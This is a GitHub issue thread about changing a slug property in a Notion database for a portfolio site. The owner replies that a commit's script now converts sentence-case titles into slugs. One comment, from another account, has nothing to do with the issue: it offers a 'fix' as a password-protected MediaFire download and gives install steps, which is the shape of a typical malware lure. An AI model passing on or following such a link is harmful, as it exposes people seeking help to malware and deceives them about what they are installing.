### ISSUE TITLE
Update slug property in the Notion database to not necessarily be of sentence format

### ISSUE THREAD

**Issue by arunsathiya** [arunsathiya/portfolio#68]

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by arunsathiya** [comment]
This is handled in 5eb9b874fa190132676491dc6aca68f18ccc636c, `chagnes-on-notion` script will always update the slug for the pages on notion side of things. So, I can type in regular sentence-case, and the script will update to a slug format.
